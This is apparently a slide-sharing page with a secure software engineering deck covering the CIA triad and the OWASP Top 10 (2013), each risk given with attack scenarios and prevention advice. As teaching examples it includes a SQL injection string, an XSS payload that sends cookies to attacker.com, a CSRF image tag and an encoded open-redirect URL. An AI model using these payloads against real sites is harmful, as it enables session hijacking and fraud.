This document discusses information security and the CIA triad of confidentiality, integrity, and availability. It then explains each of these concepts in more detail and provides examples. It also discusses the OWASP Top 10 security risks, specifically addressing SQL injection, broken authentication and session management, cross-site scripting, insecure direct object references, security misconfiguration, sensitive data exposure, missing function level access control, cross-site request forgery, using components with known vulnerabilities, and unvalidated redirects and forwards. Attack scenarios and ways to prevent each risk are provided.
The OWASP Top Ten is the de-facto web application security standard because it reflects the evolving threat landscape, providing organizations a framework to manage and mitigate application security risk.
This presentation examines the critical newcomers and pesky incumbents from both an offensive and defensive perspective. Our experts share their insight on how to harden Web applications and align your program towards OWASP compliance.
Finacle paper on secure coding practices gives an insight into application coding security and highlights how comprehensive approach in security is need to not only secure code but also web servers and databases.
Cyber attacks are a real and growing threat to businesses and an increasing number of attacks take place at application layer. The best defence against is to develop applications where security is incorporated as part of the software development lifecycle.
The OWASP Top 10 Proactive Controls project is designed to integrate security in the software development lifecycle. In this special presentation for PHPNW, based on v2.0 released this year, you will learn how to incorporate security into your software projects.
Recommended to all developers who want to learn the security techniques that can help them build more secure applications.
Ce talk est une introduction au Secure Coding pour Java. Il s'efforcera de présenter via différents exemples les bonnes pratiques permettant de développer de manière pragmatique une application java sécurisée. Nous aborderons aussi bien des pratiques fonctionnelles que des morceaux de codes java à erreurs et leur correctifs.
A two hour workshop that provides a practical introduction to secure coding. This was part of the {DECIPHER} Hackathon (https://www.eventbrite.sg/e/decipher-hackathon-tickets-57968120208).
Sharpening your Threat-Hunting Program with ATTACK FrameworkMITRE - ATT&CKcon
From MITRE ATT&CKcon Power Hour December 2020
By Hieu Tran, Threat Detection Team Lead FPT Cybersecurity Division
No matter how sophisticated and thorough your security precautions may be, you cannot assume your security measures are impenetrable. This is why you need a threat hunting program in place. But how can we implement a proper threat hunting program and run it efficiently? In this talk, we will uncover how to sharpen your threat hunting strategy by leveraging ATT&CK. Ultimately, we’ll be demonstrating how effectively employing the hunting methodology in the real-world battlefield, fighting against well-known cyber espionage actors who strongly focus on Southeast Asian countries like Vietnam, the Philippines, Laos, and Cambodia.
The OWASP Top Ten is the de-facto web application security standard because it reflects the evolving threat landscape, providing organizations a framework to manage and mitigate application security risk.
This presentation examines the critical newcomers and pesky incumbents from both an offensive and defensive perspective. Our experts share their insight on how to harden Web applications and align your program towards OWASP compliance.
Finacle paper on secure coding practices gives an insight into application coding security and highlights how comprehensive approach in security is need to not only secure code but also web servers and databases.
Cyber attacks are a real and growing threat to businesses and an increasing number of attacks take place at application layer. The best defence against is to develop applications where security is incorporated as part of the software development lifecycle.
The OWASP Top 10 Proactive Controls project is designed to integrate security in the software development lifecycle. In this special presentation for PHPNW, based on v2.0 released this year, you will learn how to incorporate security into your software projects.
Recommended to all developers who want to learn the security techniques that can help them build more secure applications.
Ce talk est une introduction au Secure Coding pour Java. Il s'efforcera de présenter via différents exemples les bonnes pratiques permettant de développer de manière pragmatique une application java sécurisée. Nous aborderons aussi bien des pratiques fonctionnelles que des morceaux de codes java à erreurs et leur correctifs.
A two hour workshop that provides a practical introduction to secure coding. This was part of the {DECIPHER} Hackathon (https://www.eventbrite.sg/e/decipher-hackathon-tickets-57968120208).
Sharpening your Threat-Hunting Program with ATTACK FrameworkMITRE - ATT&CKcon
From MITRE ATT&CKcon Power Hour December 2020
By Hieu Tran, Threat Detection Team Lead FPT Cybersecurity Division
No matter how sophisticated and thorough your security precautions may be, you cannot assume your security measures are impenetrable. This is why you need a threat hunting program in place. But how can we implement a proper threat hunting program and run it efficiently? In this talk, we will uncover how to sharpen your threat hunting strategy by leveraging ATT&CK. Ultimately, we’ll be demonstrating how effectively employing the hunting methodology in the real-world battlefield, fighting against well-known cyber espionage actors who strongly focus on Southeast Asian countries like Vietnam, the Philippines, Laos, and Cambodia.
OWASP Top 10 List Overview for Web DevelopersBenjamin Floyd
The OWASP Top 10 List was recently updated for 2013, and many developers still do not know what it is or why they should care. It is a list of the top web security threats developers need to address to produce secure websites. Most developers aren't security experts, so the OWASP Top 10 Project has created resources designed for developers to quickly test their applications. Come hear about the list, why and how you can use it to make your job easier, and learn about resources you can use to quickly determine if your applications are addressing security threats properly.
With the right skills, tools and software, you can protect yourself and remain secure. This presentation will take you from no knowledge of open source web security tools to a deep understanding of how to use them and their growing set of capabilities. This is a rare opportunity to learn how to use advanced ZAP features.
A presentation of OWASP's top 10 most common web application security flaws. The content in the slides is sourced from various sources listed in the references section.
Application Security session given as part of the Solvay Executive Master in IT Management.
Explaining application security challenges for web, mobile, cloud and internet of things.
Positioning OWASP SAMM as structural and measurable framework to get application security under control in the complete application lifecycle.
Avoiding Application Attacks: A Guide to Preventing the OWASP Top 10 from Hap...IBM Security
View the on-demand recording: http://securityintelligence.com/events/avoiding-application-attacks/
Your organization is running fast to build your business. You are developing new applications faster than ever and utilizing new cloud-based development platforms. Your customers and employees expect applications that are powerful, highly usable, and secure. Yet this need for speed coupled with new development techniques is increasing the likelihood of security issues.
How can you meet the needs of speed to market with security? Hear Paul Ionescu, IBM Security, Ethical Hacking Team Lead discuss:
- How application attacks work
- Open Web Application Security Project (OWASP) goals
- How to build defenses into your applications
- The 10 most common web application attacks, including demos of the infamous Shellshock and Heartbleed vulnerabilities
- How to test for and prevent these types of threats
1. R O H I T H A L I Y A N A G A M A
S O F T W A R E A R C H I T E C T
Secure
Software Engineering
2. Information security
Information security is the practice of defending
information from unauthorized access, use,
disclosure, disruption, modification, inspection,
recording or destruction ---- Wikipedia
CIA is a widely used benchmark for evaluation of
information systems security, focusing on the three
core goals
Confidentiality
Integrity
Availability
3. Confidentiality
Protects the data from un-authorized disclosure
Ensures the necessary level of secrecy is enforced at
each junction of data processing
Confidentiality usually implements encryption
4. Integrity
Ensuring that the data is not modified .
Must ensure accuracy and reliability of the
information and Information Systems.
Must not allow unauthorized modification
(intentional or accidental)
5. Availability
The ability to access data and systems by authorized
parties
This is very easy to attack and hard to defend
against.
Attacks are often DoS type attacks. Example of
Availability attack:
Taking down a power grid
Stopping stock market trades
6. OWASP Top 10 Web APP Security Risks( 2013)
The Open Web Application Security Project
(OWASP) is an open community dedicated to
enabling organizations to develop, purchase, and
maintain applications that can be trusted.
The goal of the Top 10 project is to raise awareness
about application security by identifying some of the
most critical risks facing organizations
8. A1-SQL Injection
A SQL injection attack consists of insertion or "injection"
of a SQL query via the input data from the client to the
application.
Example
cmd.CommandText = "select userID from Users where
userID = '" + username + "' and password = '" +
password + "'";
Now let us try to inject some SQL into this page.
Assume hacker' or 1=1-- as username and anything in the
password(even leave it empty).
select userID from Users where userID = 'hacker' or 1=1--' and
password = '‘
http://sqlzoo.net/hack/
9. A1-Preventing SQL Injection
Use of Prepared Statements (Parameterized
Queries)
Use of Stored Procedures
Escaping all User Supplied Input
Additional Defenses:
Also Enforce: Least Privilege
Also Perform: White List Input Validation
https://www.owasp.org/index.php/SQL_Injection_Prevention_
Cheat_Sheet
10. A2-Broken Authentication and Session
Management
Application functions related to authentication and session
management are often not implemented correctly, allowing
attackers to compromise passwords, keys, session tokens etc
Are credentials always protected when stored using hashing
or encryption?
(http://danielmiessler.com/study/encoding_encryption_has
hing/)
Can credentials be guessed or overwritten through weak
account management functions (e.g., account creation, change
password, recover password, weak session IDs)?
Are session IDs exposed in the URL (e.g., URL rewriting)?
Do session IDs timeout and can users log out?
Are session IDs rotated after successful login?
Are passwords, session IDs, and other credentials sent only
over TLS connections? .
11. A2-Broken Authentication and Session
Management Sample
Scenario #1: Airline reservations application supports URL
rewriting, putting session IDs in the URL:
http://example.com/sale/saleitems;jsessionid=2P0OC2JSND
LPSKHCJUN2JV?dest=Hawaii
An authenticated user of the site wants to let his friends know
about the sale. He e-mails the above link without knowing he
is also giving away his session ID. When his friends use the
link they will use his session and credit card.
Scenario #2: Application’s timeouts aren’t set properly. User
uses a public computer to access site. Instead of selecting
“logout” the user simply closes the browser tab and walks
away. Attacker uses the same browser an hour later, and that
browser is still authenticated.
Scenario #3: Insider or external attacker gains access to the
system’s password database. User passwords are not
encrypted, exposing every users’ password to the attacker
12. A3-XSS Attack Scenario
Hacker infects a legitimate web page with his malicious client-side script. When a
user visits this web page the script is downloaded to his browser and executed
13. A3-Cross-Site Scripting (XSS)
You need to ensure that all user supplied input sent back to the
browser is properly escaped before it is included in the output
page, or it is verified to be safe via input validation. Proper
output encoding ensures that such input is always treated as
text in the browser, rather than active content.
Example Attack Scenario
The application uses un trusted data in the construction of the
following HTML snippet without validation or escaping:
(String) page += "<input name='creditcard' type='TEXT‘ value='"
+ request.getParameter("CC") + "'>";
The attacker modifies the ‘CC’ parameter in their browser to:
'><script>document.location=
'http://www.attacker.com/cgi-bin/cookie.cgi?
foo='+document.cookie</script>'.
This causes the victim’s session ID to be sent to the attacker’s
website, allowing the attacker to hijack the user’s current
session.
14. A3-Prevent XSS
Properly escape all un trusted data based on the
HTML context (body, attribute, JavaScript, CSS, or
URL) that the data will be placed into.
Positive or “whitelist” input validation
Enabled ASP.NET Request Validation
15. A4-Insecure Direct Object References
A direct object reference occurs when a developer
exposes a reference to an internal implementation
object, such as a file, directory, database record, or
key, as a URL or form parameter. An attacker can
manipulate direct object references to access other
objects without authorization, unless an access
control check is in place
16. A4-Example Attack Scenario
In the example below, even if an application does not
present any links to unauthorized carts, and no SQL
injection is possible, an attacker can still change the
cartID parameter to whatever cart they want.
int cartID = Integer.parseInt( request.getParameter("cartID" ) );
String query = "SELECT * FROM table WHERE cartID=" + cartID;
As a solution ensure that SQL statements and other
database access methods only allow authorized records
to be shown
String query = "SELECT * FROM table WHERE cartID="
+ cartID + " AND userID=" + user.getID();
17. A4-Insecure Direct Object References Protection.
Avoid exposing your private object references to
users whenever possible, such as primary keys or
filenames
Validate any private object references extensively
with an "accept known good" approach
Verify authorization to all referenced objects
18. A5-Security Misconfiguration
Do you have a process for keeping all your software up to
date? This includes the OS, Web/App Server, DBMS,
applications, and all code libraries (see new A9).
Is everything unnecessary disabled, removed, or not
installed (e.g. ports, services, pages, accounts,
privileges)?
Are default account passwords changed or disabled?
Is your error handling set up to prevent stack traces and
other overly informative error messages from leaking?
Are the security settings in your development
frameworks (e.g., Struts, Spring, ASP.NET) and libraries
understood and configured properly?
19. A5-Attack Scenarios
Scenario #1: The app server admin console is automatically
installed and not removed. Default accounts aren’t changed.
Attacker discovers the standard admin pages are on your
server, logs in with default passwords, and takes over.
Scenario #2: Directory listing is not disabled on your server.
Attacker discovers she can simply list directories to find any
file. Attacker finds and downloads all your compiled Java
classes, which she reverses to get all your custom code. She
then finds a serious access control flaw in your application.
Scenario #3: App server configuration allows stack traces to
be returned to users, potentially exposing underlying flaws.
Attackers love the extra information error messages provide.
Scenario #4: App server comes with sample applications that
are not removed from your production server. Said sample
applications have well known security flaws attackers can use
to compromise your server.
20. A5-How Do I Prevent This ?
A repeatable hardening process that makes it fast and
easy to deploy another environment that is properly
locked down. Development, QA, and production
environments should all be configured identically. This
process should be automated to minimize the effort
required to setup a new secure environment.
A process of deploying all new software updates and
patches in a timely manner to each deployed
environment. This needs to include all code libraries as
well (see new A9).
Consider running scans and doing audits periodically to
help detect future misconfigurations or missing patches.
21. A6-Sensitive Data Exposure
It is encrypted everywhere it is stored long term,
including backups of this data.
It is encrypted in transit, ideally internally as well as
externally. All internet traffic should be encrypted.
Strong encryption algorithms are used for all crypto.
Strong crypto keys are generated, and proper key
management is in place, including key rotation.
Disable auto complete on forms collecting sensitive
data and disable caching for pages displaying
sensitive data.
22. A6-Example Attack Scenarios
Scenario #1: An application encrypts credit card numbers
in a database using automatic database encryption.
However, this means it also decrypts this data
automatically when retrieved, allowing an SQL injection
flaw to retrieve credit card numbers in clear text. The
system should have encrypted the credit card numbers
using a public key, and only allowed back-end
applications to decrypt them with the private key.
Scenario #2: A site simply doesn’t use SSL for all
authenticated pages. Attacker simply monitors network
traffic (like an open wireless network), and steals the
user’s session cookie. Attacker then replays this cookie
and hijacks the user’s session, accessing all their private
data.
23. A7-Missing Function Level Access Control
The best way to find out if an application has failed to
properly restrict function level access is to verify every
application function:
Does the UI show navigation to unauthorized functions?
Are proper authentication and authorization checked?
Are checks done on the server without relying on
information provided by the attacker?
Using a proxy, browse your application with a privileged
role. Then revisit restricted pages while logged in as a
less privileged role. Some proxies support this type of
analysis.
24. A8-Cross-Site Request Forgery (CSRF)
To check whether an application is vulnerable, see if
each link and form includes an unpredictable token.
Without such a token, attackers can forge malicious
requests. An alternate defense is to require the user
to prove they intended to submit the request, either
through re authentication, or some other proof they
are a real user (e.g., a CAPTCHA).
Note that session cookies, source IP addresses, and
other information automatically sent by the browser
doesn’t count since this information is also included
in forged requests.
25. A8-Example Attack Scenario
The application allows a user to submit a state changing
request that does not include anything secret. For example:
http://example.com/app/transferFunds?amount=1500&destin
ationAccount=4673243243
So, the attacker constructs a request that will transfer money
from the victim’s account to their account, and then embeds
this attack in an image request like
<img src="http://example.com/app/transferFunds?
amount=1500&destinationAccount=attackersAcct#“
width="0" height="0" />
If the victim visits any of the attacker’s sites while already
authenticated to example.com these forged requests will
automatically include the user’s session info, authorizing the
attacker’s request.
26. A8-Prevent CSRF?
Preventing CSRF usually requires the inclusion of an
unpredictable token in each HTTP request. Such tokens
should, at a minimum, be unique per user session.
The preferred option is to include the unique token in a
hidden field. This causes the value to be sent in the body
of the HTTP request, avoiding its inclusion in the URL,
which is subject to exposure.
The unique token can also be included in the URL itself,
or a URL parameter. However, such placement runs the
risk that the URL will be exposed to an attacker, thus
compromising the secret token.
27. A9-Using Components with Known
Vulnerabilities-How Do I Prevent This?
One option is not to use components that you didn’t write. But
realistically, the best way to deal with this risk is to ensure
that you keep your components up-to-date.
Many open source projects (and other component sources) do
not create vulnerability patches for old versions. Instead, most
simply fix the problem in the next version. Software projects
should have a process in place to:
Identify the components and their versions you are using, including all
dependencies. (e.g., the versions plug-in).
Monitor the security of these components in public databases, project
mailing lists, and security mailing lists, and keep them up-to-date.
Establish security policies governing component use, such as requiring
certain software development practices, passing security tests, and
acceptable licenses.
28. A10-Unvalidated Redirects and Forwards
Scenario #1: The application has a page called
“redirect.jsp” which takes a single parameter named
“url”. The attacker crafts a malicious URL that
redirects users to a malicious site that performs
phishing and installs malware.
http://www.example.com/redirect.jsp?url=evil.com
29. A10-How Do I Prevent This?
Safe use of redirects and forwards can be done in a number
of ways:
Simply avoid using redirects and forwards.
If used, don’t involve user parameters in calculating the
destination. This can usually be done.
If destination parameters can’t be avoided, ensure that
the supplied value is valid, and authorized for the user.
It is recommended that any such destination parameters
be a mapping value, rather than the actual URL or
portion of the URL, and that server side code translate
this mapping to the target URL.
30. A10-Unvalidated Redirects and Forwards on
eBay
How this attacks to eBay
http://cgi4.ebay.com/ws/eBayISAPI.dll?MfcISAPIC
ommand=RedirectToDomain&DomainUrl=http%3A
%2F%2F%32%31%31%2E%31%37%32%2E%39%36
%2E%37%2FUpdateCenter%2FLogin%2F%3FMfcIS
APISession%3DAAJbaQqzeHAAeMWZlHhlWXS2Al
BXVShqAhQRfhgTDrferHCURstpAisNRqAhQRfhgT
DrferHCURstpAisNRpAisNRqAhQRfhgTDrferHCU
QRfqzeHAAeMWZlHhlWXh